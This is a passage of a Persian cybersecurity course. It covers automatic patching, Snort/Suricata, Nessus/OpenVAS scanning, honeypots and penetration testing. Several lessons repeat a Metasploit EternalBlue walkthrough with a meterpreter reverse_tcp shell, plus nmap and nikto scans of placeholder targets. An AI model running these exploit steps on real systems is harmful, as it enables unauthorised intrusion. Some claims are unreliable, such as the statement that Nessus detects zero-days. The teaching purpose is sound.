استفاده از خدمات ابری برای Mitigation حملات، به‌ویژه حملات DDoS، بسیار موثر است و با ابزارهایی همچون AWS Shield, Google Cloud Armor, و Azure DDoS Protection می‌توان از منابع خود در برابر تهدیدات سایبری حفاظت کرد. با پیکربندی صحیح و استفاده از ابزارهای فایروال و نظارتی، می‌توان امنیت بیشتری را در سیستم‌های ابری تضمین کرد و از آسیب‌دیدگی به منابع حیاتی جلوگیری کرد.[/cdb_course_lesson][cdb_course_lesson title=”مقابله با حملات Zero-Day”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”پیاده‌سازی به‌روزرسانی‌های خودکار و بروزرسانی‌های امنیتی” subtitle=”توضیحات کامل”]حملات Zero-Day به حملاتی اطلاق می‌شود که در آن‌ها مهاجم از یک آسیب‌پذیری که هنوز توسط تولیدکنندگان نرم‌افزار شناخته نشده است، بهره‌برداری می‌کند. این نوع حملات معمولاً پس از شناسایی آسیب‌پذیری‌ها، بسیار سریع رخ می‌دهند و می‌توانند خسارت‌های فراوانی ایجاد کنند. یکی از مؤثرترین روش‌ها برای مقابله با حملات Zero-Day، به‌روزرسانی‌های امنیتی به‌موقع و پیاده‌سازی به‌روزرسانی‌های خودکار است. در این قسمت، به بررسی راهکارهای مختلف برای مقابله با این نوع حملات خواهیم پرداخت.

1. پیاده‌سازی به‌روزرسانی‌های خودکار

یکی از مهم‌ترین اقدامات برای مقابله با آسیب‌پذیری‌های Zero-Day، پیاده‌سازی به‌روزرسانی‌های خودکار است. به‌روزرسانی‌های خودکار باعث می‌شوند که سیستم‌ها به‌طور خودکار نرم‌افزارها و بسته‌های امنیتی را دریافت و نصب کنند، بدون اینکه نیاز به مداخله دستی باشد.

1.1. فعال‌سازی به‌روزرسانی خودکار در سیستم‌های لینوکسی

در سیستم‌های لینوکسی، یکی از روش‌های اصلی برای فعال کردن به‌روزرسانی خودکار، استفاده از ابزارهایی مانند unattended-upgrades است که به‌طور خودکار بسته‌های امنیتی را نصب می‌کند. برای فعال‌سازی این ابزار، مراحل زیر را دنبال کنید:

1. ابتدا unattended-upgrades را نصب کنید:

sudo apt-get install unattended-upgrades

2. سپس فایل پیکربندی را باز کنید:

sudo nano /etc/apt/apt.conf.d/50unattended-upgrades

3. در این فایل، خط‌های مربوط به نصب به‌روزرسانی‌های امنیتی را پیدا کرده و مطمئن شوید که تنظیمات به درستی فعال هستند. به‌عنوان مثال:

"${distro_id}:${distro_codename}-security";

4. در نهایت، برای فعال‌سازی به‌روزرسانی خودکار، فایل پیکربندی apt را ویرایش کنید:

sudo nano /etc/apt/apt.conf.d/10periodic

و تنظیمات زیر را وارد کنید:

APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";
APT::Periodic::AutocleanInterval "7";

این تنظیمات به‌روزرسانی‌ها را به‌طور خودکار در فواصل منظم انجام می‌دهند.

1.2. پیاده‌سازی به‌روزرسانی‌های خودکار در سیستم‌های ویندوز

در سیستم‌های ویندوز، می‌توان از Windows Update برای فعال کردن به‌روزرسانی‌های خودکار استفاده کرد. برای انجام این کار:

1. وارد Control Panel شوید.
2. به بخش System and Security بروید.
3. روی Windows Update کلیک کنید.
4. در منوی سمت چپ، گزینه Change settings را انتخاب کنید.
5. در این بخش، گزینه Install updates automatically (recommended) را فعال کنید تا به‌روزرسانی‌ها به‌طور خودکار نصب شوند.

همچنین می‌توانید از دستور PowerShell برای بررسی و نصب به‌روزرسانی‌ها استفاده کنید:

Install-WindowsUpdate -AcceptAll -AutoReboot

2. پیاده‌سازی بروزرسانی‌های امنیتی به‌طور منظم

برای مقابله با حملات Zero-Day، علاوه بر به‌روزرسانی‌های خودکار، باید یک فرآیند منظم برای پیاده‌سازی به‌روزرسانی‌های امنیتی در نظر گرفته شود. این فرآیند باید شامل به‌روزرسانی‌های سیستم‌عامل، نرم‌افزارها و هرگونه پکیج وابسته به سیستم باشد.

2.1. به‌روزرسانی‌های امنیتی در لینوکس

در سیستم‌های لینوکسی می‌توانید با استفاده از دستور زیر، به‌روزرسانی‌های امنیتی را به‌طور دستی نصب کنید:

sudo apt-get update
sudo apt-get upgrade

همچنین، برای نصب به‌روزرسانی‌های امنیتی به‌صورت خودکار در هر زمان، می‌توانید از دستور زیر استفاده کنید:

sudo unattended-upgrade

2.2. به‌روزرسانی‌های امنیتی در ویندوز

در ویندوز، به‌روزرسانی‌های امنیتی از طریق Windows Update قابل نصب هستند. برای نصب به‌روزرسانی‌های دستی، دستور زیر را در PowerShell وارد کنید:

Get-WindowsUpdate -Install

این دستور به‌طور خودکار به‌روزرسانی‌های موجود را دریافت و نصب می‌کند.

3. استفاده از ابزارهای تحلیل آسیب‌پذیری برای شناسایی آسیب‌پذیری‌های Zero-Day

برای شناسایی آسیب‌پذیری‌های ناشناخته که هنوز هیچ به‌روزرسانی امنیتی برای آن‌ها وجود ندارد، می‌توان از ابزارهای تحلیل آسیب‌پذیری مانند Nessus، OpenVAS و Qualys استفاده کرد. این ابزارها به شناسایی آسیب‌پذیری‌های سیستم کمک کرده و به شما این امکان را می‌دهند که پیش از اینکه حمله‌ای صورت گیرد، نسبت به آن‌ها اقدام کنید.

3.1. نصب Nessus برای تحلیل آسیب‌پذیری‌ها

برای نصب Nessus بر روی سیستم لینوکسی، مراحل زیر را دنبال کنید:

1. ابتدا Nessus را از وب‌سایت رسمی آن دانلود کنید:

wget https://www.tenable.com/downloads/api/v1/public/pages/nessus/downloads/11039/download?i=3a0a5eaf-7887-4c5f-b132-f1ba34568959

2. پس از دانلود، فایل را استخراج کنید:

tar -xvzf Nessus-*.tar.gz

3. سپس سرویس Nessus را راه‌اندازی کنید:

sudo systemctl start nessusd

4. برای شروع به استفاده از Nessus، به صفحه وب آن مراجعه کرده و ورود کنید.

3.2. استفاده از OpenVAS

برای نصب و استفاده از OpenVAS (که اکنون به نام Greenbone Vulnerability Management (GVM) شناخته می‌شود)، مراحل زیر را دنبال کنید:

1. ابتدا پکیج OpenVAS را نصب کنید:

sudo apt-get install openvas

2. سپس پایگاه داده OpenVAS را راه‌اندازی کنید:

sudo gvm-setup

3. پس از راه‌اندازی، می‌توانید از ابزار Greenbone Security Assistant برای اسکن آسیب‌پذیری‌ها استفاده کنید.

جمع‌بندی

برای مقابله مؤثر با حملات Zero-Day، پیاده‌سازی به‌روزرسانی‌های خودکار و بروزرسانی‌های امنیتی به‌طور منظم ضروری است. با استفاده از ابزارهای به‌روزرسانی خودکار مانند unattended-upgrades در لینوکس و Windows Update در ویندوز، می‌توان آسیب‌پذیری‌های سیستم را کاهش داد. علاوه بر این، استفاده از ابزارهای تحلیل آسیب‌پذیری مانند Nessus و OpenVAS می‌تواند به شناسایی آسیب‌پذیری‌های جدید کمک کرده و امنیت سیستم‌ها را در برابر تهدیدات Zero-Day افزایش دهد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”ابزارهای جلوگیری از نفوذ و شناسایی آسیب‌پذیری‌ها” subtitle=”توضیحات کامل”]حملات Zero-Day به حملاتی اطلاق می‌شود که از آسیب‌پذیری‌هایی بهره می‌برند که هنوز توسط تولیدکنندگان نرم‌افزار شناسایی یا اصلاح نشده‌اند. از آنجا که این نوع حملات به طور معمول به سرعت رخ می‌دهند و معمولاً قبل از شناسایی و رفع آسیب‌پذیری‌ها اتفاق می‌افتند، استفاده از ابزارهایی برای شناسایی و جلوگیری از نفوذ و آسیب‌پذیری‌ها می‌تواند بسیار مؤثر باشد. در این بخش به بررسی ابزارهای جلوگیری از نفوذ و شناسایی آسیب‌پذیری‌ها خواهیم پرداخت که به طور خاص برای مقابله با حملات Zero-Day طراحی شده‌اند.

1. ابزارهای جلوگیری از نفوذ (IDS/IPS)

ابزارهای سیستم‌های تشخیص نفوذ (IDS) و سیستم‌های پیشگیری از نفوذ (IPS) به شناسایی و جلوگیری از حملات پیشرفته مانند حملات Zero-Day کمک می‌کنند. این ابزارها به طور مداوم ترافیک شبکه را نظارت می‌کنند و با شناسایی الگوهای مخرب و تهدیدات، اقدامات متناسب را انجام می‌دهند.

1.1. استفاده از Snort به عنوان IDS

Snort یک ابزار متن‌باز بسیار محبوب برای تشخیص و پیشگیری از نفوذ است. این ابزار به طور خاص می‌تواند برای شناسایی حملات Zero-Day از طریق تحلیل ترافیک شبکه و استفاده از قوانین مشخص، مفید باشد.

برای نصب Snort بر روی لینوکس، از دستور زیر استفاده کنید:

sudo apt-get install snort

پس از نصب، فایل پیکربندی Snort را ویرایش کنید:

sudo nano /etc/snort/snort.conf

در این فایل، می‌توانید قوانین مختلف برای تشخیص حملات مختلف، از جمله حملات Zero-Day، را تنظیم کنید. سپس برای شروع نظارت بر ترافیک شبکه از دستور زیر استفاده کنید:

sudo snort -A console -c /etc/snort/snort.conf -i eth0

1.2. استفاده از Suricata به عنوان IPS

Suricata یک ابزار پیشرفته برای پیشگیری از نفوذ است که می‌تواند علاوه بر نظارت بر ترافیک، حملات Zero-Day را شناسایی و جلوی آن‌ها را بگیرد. Suricata به طور ویژه از پروتکل‌های مختلف پشتیبانی می‌کند و از قابلیت‌های پیشرفته‌ای مانند تحلیل عمیق بسته‌ها (Deep Packet Inspection) برخوردار است.

برای نصب Suricata، از دستور زیر استفاده کنید:

sudo apt-get install suricata

برای فعال‌سازی و پیکربندی آن، ابتدا فایل پیکربندی Suricata را ویرایش کنید:

sudo nano /etc/suricata/suricata.yaml

پس از پیکربندی، می‌توانید Suricata را با دستور زیر اجرا کنید:

sudo suricata -c /etc/suricata/suricata.yaml -i eth0

این ابزار به طور فعال ترافیک شبکه را بررسی کرده و تهدیدات را شناسایی می‌کند.

2. ابزارهای شناسایی آسیب‌پذیری‌ها

ابزارهای شناسایی آسیب‌پذیری‌ها می‌توانند برای شناسایی آسیب‌پذیری‌های سیستم که ممکن است توسط حملات Zero-Day بهره‌برداری شوند، بسیار مفید باشند. این ابزارها به شناسایی آسیب‌پذیری‌های موجود در نرم‌افزارها، سیستم‌عامل‌ها و پیکربندی‌های امنیتی کمک می‌کنند.

2.1. استفاده از Nessus برای شناسایی آسیب‌پذیری‌ها

Nessus یکی از شناخته‌شده‌ترین ابزارهای تحلیل آسیب‌پذیری است که قادر به شناسایی آسیب‌پذیری‌های موجود در سیستم‌ها و شبکه‌ها است. Nessus به‌ویژه برای شناسایی آسیب‌پذیری‌های Zero-Day مفید است زیرا با پایگاه‌داده‌ای از آسیب‌پذیری‌های شناخته‌شده، این ابزار به طور پیوسته آسیب‌پذیری‌ها را شناسایی و به‌روزرسانی می‌کند.

برای نصب Nessus، مراحل زیر را دنبال کنید:

1. ابتدا Nessus را از وب‌سایت رسمی آن دانلود کنید:

wget https://www.tenable.com/downloads/api/v1/public/pages/nessus/downloads/11039/download?i=3a0a5eaf-7887-4c5f-b132-f1ba34568959

2. سپس فایل را استخراج کنید:

tar -xvzf Nessus-*.tar.gz

3. پس از استخراج، سرویس Nessus را راه‌اندازی کنید:

sudo systemctl start nessusd

4. برای استفاده از Nessus، به صفحه وب آن مراجعه کرده و وارد سیستم شوید.

2.2. استفاده از OpenVAS برای شناسایی آسیب‌پذیری‌ها

OpenVAS (که به‌طور جدیدتر به Greenbone Vulnerability Management تغییر نام داده است) یکی دیگر از ابزارهای بسیار مفید برای شناسایی آسیب‌پذیری‌ها است. این ابزار از پایگاه‌داده بزرگی برای شناسایی آسیب‌پذیری‌های سیستم‌ها و برنامه‌ها استفاده می‌کند و قابلیت شناسایی آسیب‌پذیری‌های Zero-Day را نیز دارا است.

برای نصب OpenVAS، از دستور زیر استفاده کنید:

sudo apt-get install openvas

پس از نصب، پایگاه‌داده OpenVAS را راه‌اندازی کنید:

sudo gvm-setup

پس از راه‌اندازی، از ابزار Greenbone Security Assistant برای انجام اسکن آسیب‌پذیری‌ها استفاده کنید.

3. استفاده از Honeypot برای شناسایی حملات Zero-Day

یکی از روش‌های مفید دیگر برای شناسایی حملات Zero-Day، استفاده از Honeypot است. Honeypot یک سیستم یا سرویس فریب‌دهنده است که به‌طور عمدی آسیب‌پذیری‌هایی را در خود ایجاد می‌کند تا حملات مهاجمین را جذب کند. این ابزارها می‌توانند به شناسایی آسیب‌پذیری‌های Zero-Day و تحلیل رفتار مهاجمین کمک کنند.

برای نصب Honeyd به‌عنوان Honeypot بر روی سیستم لینوکسی، از دستورات زیر استفاده کنید:

1. نصب Honeyd:

sudo apt-get install honeyd

2. پیکربندی Honeyd برای شبیه‌سازی سرویس‌های آسیب‌پذیر:

sudo nano /etc/honeyd.conf

در فایل پیکربندی، سرویس‌های آسیب‌پذیر را تعریف کنید.

3. راه‌اندازی Honeyd:

sudo honeyd -d -f /etc/honeyd.conf

جمع‌بندی

برای مقابله با حملات Zero-Day، ابزارهای مختلفی مانند Snort و Suricata برای جلوگیری از نفوذ و شناسایی آسیب‌پذیری‌ها می‌توانند مفید باشند. علاوه بر این، استفاده از ابزارهای شناسایی آسیب‌پذیری مانند Nessus و OpenVAS به شناسایی آسیب‌پذیری‌های موجود در سیستم‌ها و برنامه‌ها کمک می‌کند. همچنین، استفاده از Honeypot می‌تواند به شبیه‌سازی محیط‌های آسیب‌پذیر برای شناسایی حملات Zero-Day و تحلیل رفتار مهاجمین کمک کند.[/cdb_course_lesson][cdb_course_lesson title=”فصل 7. تست نفوذ و ارزیابی امنیتی”][/cdb_course_lesson][cdb_course_lesson title=”اجرای تست‌های نفوذ (Penetration Testing)”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از ابزارهایی مانند Metasploit و Nessus برای ارزیابی امنیت” subtitle=”توضیحات کامل”]تست‌های نفوذ یکی از مهم‌ترین روش‌ها برای ارزیابی و تحلیل امنیت سیستم‌ها، شبکه‌ها و برنامه‌های کاربردی هستند. هدف اصلی این تست‌ها شبیه‌سازی حملاتی است که ممکن است توسط مهاجمان انجام شود تا نقاط ضعف امنیتی سیستم‌ها شناسایی و اصلاح شوند. در این بخش، به بررسی دو ابزار متداول برای تست نفوذ، یعنی Metasploit و Nessus خواهیم پرداخت. این دو ابزار به ترتیب برای شبیه‌سازی حملات و ارزیابی آسیب‌پذیری‌ها استفاده می‌شوند.

---

استفاده از Metasploit برای ارزیابی امنیت

Metasploit یکی از قدرتمندترین و شناخته‌شده‌ترین ابزارها در دنیای تست‌های نفوذ است که به متخصصان امنیت کمک می‌کند تا به شبیه‌سازی حملات و کشف آسیب‌پذیری‌های سیستم بپردازند. این ابزار شامل یک مجموعه کامل از exploits، payloads و ابزارهای دیگر است که امکان شبیه‌سازی انواع حملات مختلف را فراهم می‌کند.

1. نصب Metasploit:

برای نصب Metasploit، ابتدا باید سیستم خود را به‌روزرسانی کنید و سپس بسته Metasploit را از مخازن رسمی نصب نمایید.

کد نصب در سیستم‌های مبتنی بر Ubuntu/Debian:

sudo apt update
sudo apt install metasploit-framework

2. اجرای Metasploit:

پس از نصب، می‌توانید Metasploit را با استفاده از دستور زیر راه‌اندازی کنید:

msfconsole

این دستور باعث می‌شود که کنسول Metasploit باز شود و شما بتوانید از آن برای اجرای تست‌های نفوذ استفاده کنید.

3. استفاده از Metasploit برای شبیه‌سازی حملات:

برای استفاده از یک exploit در Metasploit، ابتدا باید نوع آسیب‌پذیری و هدف خود را مشخص کنید. به‌عنوان مثال، اگر بخواهید حمله‌ای برای آسیب‌پذیری MS17-010 (که در Windows SMB وجود دارد) انجام دهید، ابتدا باید exploit مربوط به این آسیب‌پذیری را انتخاب کنید.

دستور انتخاب exploit:

use exploit/windows/smb/ms17_010_eternalblue

پس از انتخاب exploit، شما باید payload مناسب را برای هدف خود انتخاب کنید:

دستور انتخاب payload:

set payload windows/x64/meterpreter/reverse_tcp

سپس باید آدرس IP و پورت مقصد را تنظیم کنید:

set RHOSTS [target_ip]
set LHOST [your_ip]
set LPORT [port_number]

در نهایت، با دستور زیر حمله را شروع می‌کنید:

exploit

---

استفاده از Nessus برای ارزیابی آسیب‌پذیری‌ها

Nessus یک ابزار قدرتمند برای شناسایی آسیب‌پذیری‌ها است که در بسیاری از ارزیابی‌های امنیتی استفاده می‌شود. این ابزار به‌ویژه برای ارزیابی آسیب‌پذیری‌های شبکه و سیستم‌ها طراحی شده و می‌تواند برای شناسایی ضعف‌های امنیتی به‌طور مؤثر مورد استفاده قرار گیرد.

1. نصب Nessus:

برای نصب Nessus بر روی سیستم، ابتدا باید آن را از سایت رسمی دانلود کرده و سپس مراحل نصب را طی کنید.

کد نصب برای سیستم‌های مبتنی بر Ubuntu/Debian:

ابتدا فایل deb Nessus را از وب‌سایت رسمی دانلود کنید.

wget https://www.tenable.com/downloads/api/v1/public/pages/nessus/downloads/11221/download?i_agree_to_tenable_license_agreement=true

سپس، بسته را نصب کنید:

sudo dpkg -i Nessus-<version>.deb

پس از نصب، Nessus را با دستور زیر راه‌اندازی کنید:

sudo systemctl start nessusd

2. دسترسی به رابط کاربری وب Nessus:

برای دسترسی به رابط کاربری وب Nessus، مرورگر خود را باز کرده و آدرس زیر را وارد کنید:

https://localhost:8834

در این مرحله، باید یک حساب کاربری برای دسترسی به Nessus بسازید.

3. انجام اسکن آسیب‌پذیری با Nessus:

پس از ورود به رابط کاربری، شما می‌توانید یک اسکن جدید را برای شناسایی آسیب‌پذیری‌ها راه‌اندازی کنید. برای این کار، مراحل زیر را دنبال کنید:

• به بخش “New Scan” بروید.
• نوع اسکن را انتخاب کنید (برای مثال “Basic Network Scan”).
• هدف (IP یا دامنه) را وارد کنید.
• گزینه‌های مربوط به اسکن را تنظیم کرده و سپس اسکن را اجرا کنید.

پس از اجرای اسکن، Nessus گزارشی از آسیب‌پذیری‌های شناسایی‌شده را نمایش خواهد داد که شامل جزئیات مربوط به هر آسیب‌پذیری و روش‌های اصلاح آن است.

---

جمع بندی

در این بخش، دو ابزار مهم و کاربردی برای ارزیابی امنیت، یعنی Metasploit و Nessus را معرفی کردیم. Metasploit به‌عنوان ابزاری برای شبیه‌سازی حملات و نفوذ به سیستم‌ها به‌کار می‌رود، در حالی که Nessus به‌عنوان ابزاری برای شناسایی آسیب‌پذیری‌ها در شبکه‌ها و سیستم‌ها استفاده می‌شود. هر دو ابزار قدرت زیادی در شبیه‌سازی حملات و ارزیابی آسیب‌پذیری‌ها دارند و می‌توانند در ارزیابی امنیت سیستم‌ها بسیار مؤثر باشند.

 [/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”شبیه‌سازی حملات برای شناسایی آسیب‌پذیری‌های سیستم” subtitle=”توضیحات کامل”]شبیه‌سازی حملات (Penetration Testing) به‌منظور شناسایی آسیب‌پذیری‌ها در سیستم‌ها، شبکه‌ها و برنامه‌ها استفاده می‌شود. در این قسمت، به شبیه‌سازی حملات برای کشف آسیب‌پذیری‌ها و روش‌های استفاده از ابزارهای مختلف برای انجام این حملات خواهیم پرداخت. هدف این کار شبیه‌سازی شرایط واقعی حمله به سیستم‌ها و در نهایت شناسایی نقاط ضعف آنها است. ابزارهایی مانند Metasploit و Nessus از جمله ابزارهای معمول برای انجام این کار هستند. همچنین، به صورت عملی نحوه استفاده از آنها و انجام حملات را بررسی خواهیم کرد.

---

۱. شبیه‌سازی حملات با استفاده از Metasploit

Metasploit یکی از معروف‌ترین و قدرتمندترین ابزارهای موجود برای شبیه‌سازی حملات است. این ابزار به شما این امکان را می‌دهد که به‌طور مستقیم حملات مختلف را شبیه‌سازی کنید و به آسیب‌پذیری‌های موجود در سیستم‌ها دست یابید. در این بخش، نحوه استفاده از Metasploit برای انجام حملات و شبیه‌سازی آسیب‌پذیری‌ها آورده شده است.

۱.۱. نصب Metasploit:

برای نصب Metasploit، ابتدا باید آن را از مخازن رسمی نصب کنید.

کد نصب برای سیستم‌های مبتنی بر Ubuntu/Debian:

sudo apt update
sudo apt install metasploit-framework

۱.۲. راه‌اندازی Metasploit:

پس از نصب، Metasploit را می‌توان با دستور زیر راه‌اندازی کرد:

msfconsole

۱.۳. شبیه‌سازی حملات با Metasploit:

برای انجام یک حمله شبیه‌سازی‌شده با استفاده از Metasploit، مراحل زیر را دنبال کنید:

• ابتدا باید نوع آسیب‌پذیری سیستم هدف را شبیه‌سازی کنید. به‌عنوان مثال، برای آزمایش آسیب‌پذیری MS17-010 (که بر روی Windows SMB است) باید از exploit مناسب استفاده کنید.

انتخاب exploit:

use exploit/windows/smb/ms17_010_eternalblue

• سپس باید payload مناسب را انتخاب کنید:

set payload windows/x64/meterpreter/reverse_tcp

• پس از انتخاب payload، باید اطلاعات مربوط به IP مقصد (RHOSTS) و آدرس IP خود (LHOST) را وارد کنید:

set RHOSTS [target_ip]
set LHOST [your_ip]
set LPORT [port_number]

• در نهایت، برای شروع حمله، دستور زیر را وارد کنید:

exploit

این دستور باعث می‌شود که حمله بر روی سیستم هدف اجرا شود و در صورتی که آسیب‌پذیری موجود باشد، امکان نفوذ به سیستم فراهم می‌شود.

---

۲. شبیه‌سازی حملات با استفاده از Nessus

Nessus یک ابزار بسیار قوی برای شناسایی آسیب‌پذیری‌ها است که از آن برای ارزیابی امنیت سیستم‌ها و شبیه‌سازی حملات استفاده می‌شود. Nessus قادر است آسیب‌پذیری‌های موجود در سیستم‌ها و شبکه‌ها را شناسایی کرده و گزارشی از آنها ارائه دهد. در این بخش نحوه استفاده از Nessus برای شبیه‌سازی حملات و شناسایی آسیب‌پذیری‌ها آورده شده است.

۲.۱. نصب Nessus:

برای نصب Nessus، ابتدا باید فایل نصب مربوطه را دانلود کرده و نصب کنید. کد زیر برای نصب در سیستم‌های مبتنی بر Ubuntu/Debian است:

wget https://www.tenable.com/downloads/api/v1/public/pages/nessus/downloads/11221/download?i_agree_to_tenable_license_agreement=true
sudo dpkg -i Nessus-<version>.deb

سپس سرویس Nessus را با استفاده از دستور زیر راه‌اندازی کنید:

sudo systemctl start nessusd

۲.۲. دسترسی به رابط کاربری Nessus:

برای دسترسی به رابط کاربری وب Nessus، از مرورگر خود به آدرس زیر بروید:

https://localhost:8834

و در آنجا با وارد کردن نام کاربری و رمز عبور وارد شوید.

۲.۳. شبیه‌سازی حملات و اسکن آسیب‌پذیری‌ها با Nessus:

در رابط کاربری Nessus، برای شبیه‌سازی حملات و اسکن آسیب‌پذیری‌ها، مراحل زیر را طی کنید:

• به بخش “New Scan” بروید.
• نوع اسکن (برای مثال “Basic Network Scan”) را انتخاب کنید.
• آدرس IP یا دامنه سیستم هدف را وارد کنید.
• گزینه‌های اسکن را تنظیم کنید و سپس اسکن را اجرا کنید.

Nessus پس از اجرای اسکن، گزارشی از آسیب‌پذیری‌های شناسایی‌شده را نمایش می‌دهد که شامل جزئیات آسیب‌پذیری‌ها و راه‌حل‌های پیشنهادی برای برطرف کردن آنها می‌شود.

---

۳. شبیه‌سازی حملات با استفاده از ابزارهای دیگر

علاوه بر Metasploit و Nessus، ابزارهای دیگری مانند Nmap، Wireshark و Nikto نیز برای شبیه‌سازی حملات و شناسایی آسیب‌پذیری‌ها استفاده می‌شوند. این ابزارها به شما کمک می‌کنند که درک بهتری از وضعیت امنیتی شبکه و سیستم‌های خود پیدا کنید.

۳.۱. استفاده از Nmap برای شناسایی آسیب‌پذیری‌ها:

Nmap یکی از ابزارهای محبوب برای شناسایی آسیب‌پذیری‌های شبکه است. با استفاده از آن می‌توان اطلاعات مفیدی درباره پورت‌های باز، سرویس‌های در حال اجرا، و سیستم‌عامل‌های استفاده‌شده بر روی میزبان‌های هدف به دست آورد.

برای اسکن یک شبکه با Nmap و شبیه‌سازی حملات، از دستور زیر استفاده کنید:

nmap -sV [target_ip]

این دستور نسخه‌های سرویس‌های در حال اجرا بر روی سیستم هدف را شناسایی خواهد کرد.

۳.۲. استفاده از Nikto برای شبیه‌سازی حملات به وب‌سایت‌ها:

Nikto یک ابزار خط فرمان برای اسکن آسیب‌پذیری‌های وب‌سایت‌ها است. این ابزار می‌تواند اطلاعاتی از جمله آسیب‌پذیری‌های XSS، SQL Injection و مشکلات مربوط به سرورهای وب را شبیه‌سازی و شناسایی کند.

برای اسکن یک وب‌سایت با Nikto، از دستور زیر استفاده کنید:

nikto -h http://[target_website]

این دستور به بررسی آسیب‌پذیری‌های شناخته‌شده وب‌سایت هدف خواهد پرداخت.

---

جمع بندی

در این بخش، به بررسی نحوه شبیه‌سازی حملات برای شناسایی آسیب‌پذیری‌ها در سیستم‌ها، شبکه‌ها و وب‌سایت‌ها پرداختیم. ابزارهای قدرتمندی مانند Metasploit، Nessus، Nmap و Nikto برای شبیه‌سازی حملات و شناسایی نقاط ضعف در سیستم‌ها و برنامه‌ها به‌کار می‌روند. با استفاده از این ابزارها، متخصصان امنیت می‌توانند به‌طور مؤثر آسیب‌پذیری‌ها را شبیه‌سازی کرده و راه‌حل‌های لازم برای بهبود امنیت سیستم‌ها را پیاده‌سازی کنند.[/cdb_course_lesson][cdb_course_lesson title=”تحلیل و ارزیابی امنیتی”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”ارزیابی ریسک و شناسایی نقاط ضعف سیستم” subtitle=”توضیحات کامل”]ارزیابی ریسک یکی از مهم‌ترین فرآیندها در مدیریت امنیت سایبری است که هدف آن شناسایی و ارزیابی آسیب‌پذیری‌ها و تهدیداتی است که می‌توانند بر عملکرد سیستم‌ها، شبکه‌ها و داده‌ها تأثیر بگذارند. این ارزیابی به متخصصان امنیت کمک می‌کند تا بهترین تصمیمات را برای کاهش ریسک‌ها اتخاذ کنند. در این بخش، به شناسایی نقاط ضعف سیستم و ارزیابی ریسک‌ها از طریق ابزارها و تکنیک‌های مختلف خواهیم پرداخت.

---

۱. مفهوم ارزیابی ریسک

ارزیابی ریسک فرآیندی است که در آن تهدیدات، آسیب‌پذیری‌ها و احتمال وقوع آنها به‌طور سیستماتیک تحلیل می‌شود. این فرآیند به‌طور خاص بر ارزیابی اثرات احتمالی این تهدیدات بر سیستم‌ها و اطلاعات حساس تمرکز دارد. مراحل اصلی ارزیابی ریسک به شرح زیر است:

1. شناسایی تهدیدات و آسیب‌پذیری‌ها: ابتدا تهدیدات ممکن (مانند حملات سایبری، خرابی سخت‌افزاری، خطاهای انسانی) و آسیب‌پذیری‌های سیستم‌ها شناسایی می‌شوند.
2. ارزیابی احتمال وقوع: سپس احتمال وقوع هر تهدید و آسیب‌پذیری مورد ارزیابی قرار می‌گیرد.
3. تحلیل اثرات: تأثیرات احتمالی این تهدیدات بر سیستم‌ها و داده‌ها بررسی می‌شود.
4. اولویت‌بندی ریسک‌ها: ریسک‌ها بر اساس احتمال وقوع و شدت اثراتشان اولویت‌بندی می‌شوند.
5. مدیریت و کاهش ریسک: در این مرحله، اقدامات لازم برای کاهش یا مدیریت ریسک‌ها اتخاذ می‌شود.

---

۲. ابزارهای ارزیابی ریسک

برای انجام ارزیابی ریسک و شناسایی نقاط ضعف سیستم، ابزارهای مختلفی وجود دارند که به‌طور خودکار این فرآیندها را تسهیل می‌کنند. در این بخش، به بررسی چند ابزار مهم برای ارزیابی ریسک و شناسایی نقاط ضعف خواهیم پرداخت.

۲.۱. استفاده از Nessus برای شناسایی آسیب‌پذیری‌ها و ارزیابی ریسک

Nessus به‌عنوان یکی از ابزارهای برتر در شناسایی آسیب‌پذیری‌ها، می‌تواند به شما کمک کند تا نقاط ضعف سیستم را شناسایی کرده و ارزیابی دقیقی از ریسک‌ها انجام دهید.

نحوه استفاده از Nessus برای ارزیابی ریسک:

1. نصب Nessus: برای نصب Nessus، ابتدا باید آن را از سایت رسمی دانلود کرده و نصب کنید. این ابزار قابلیت اسکن آسیب‌پذیری‌های سیستم‌ها، شبکه‌ها و وب‌سایت‌ها را دارد.

wget https://www.tenable.com/downloads/api/v1/public/pages/nessus/downloads/11221/download?i_agree_to_tenable_license_agreement=true
sudo dpkg -i Nessus-<version>.deb
sudo systemctl start nessusd

2. اجرای اسکن آسیب‌پذیری‌ها: پس از نصب، از رابط کاربری وب Nessus برای اجرای اسکن استفاده کنید. برای این کار، باید سیستم یا شبکه مورد نظر را انتخاب کرده و اسکن را شروع کنید. گزارش‌هایی که Nessus پس از اسکن به شما ارائه می‌دهد، شامل جزئیات دقیق نقاط ضعف و آسیب‌پذیری‌ها خواهد بود.

nmap -sV [target_ip]   # استفاده از Nmap برای شناسایی سرویس‌های فعال در سیستم

۲.۲. استفاده از Metasploit برای شبیه‌سازی حملات و ارزیابی ریسک

Metasploit می‌تواند به‌عنوان ابزاری برای شبیه‌سازی حملات مورد استفاده قرار گیرد تا اثرات تهدیدات و آسیب‌پذیری‌های مختلف را شبیه‌سازی کرده و ارزیابی ریسک را انجام دهد.

نحوه استفاده از Metasploit برای ارزیابی ریسک:

1. راه‌اندازی Metasploit: برای شروع، باید متااسپلویت را نصب و راه‌اندازی کنید.

sudo apt-get update
sudo apt-get install metasploit-framework
msfconsole

2. شبیه‌سازی حمله: از متااسپلویت برای شبیه‌سازی حملات استفاده کنید. به‌عنوان مثال، حملات EternalBlue یکی از حملات معروف است که می‌توانید با استفاده از Metasploit آن را شبیه‌سازی کنید.

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [target_ip]
set LHOST [your_ip]
exploit

پس از اجرای این حمله، نتایج آن می‌تواند به‌عنوان نقطه شروعی برای ارزیابی ریسک‌ها در نظر گرفته شود.

---

۳. تحلیل اثرات و اولویت‌بندی ریسک‌ها

پس از شناسایی آسیب‌پذیری‌ها و تهدیدات، نوبت به تحلیل اثرات و اولویت‌بندی ریسک‌ها می‌رسد. این مرحله شامل ارزیابی احتمال وقوع تهدیدات و تحلیل شدت اثرات آن‌ها است.

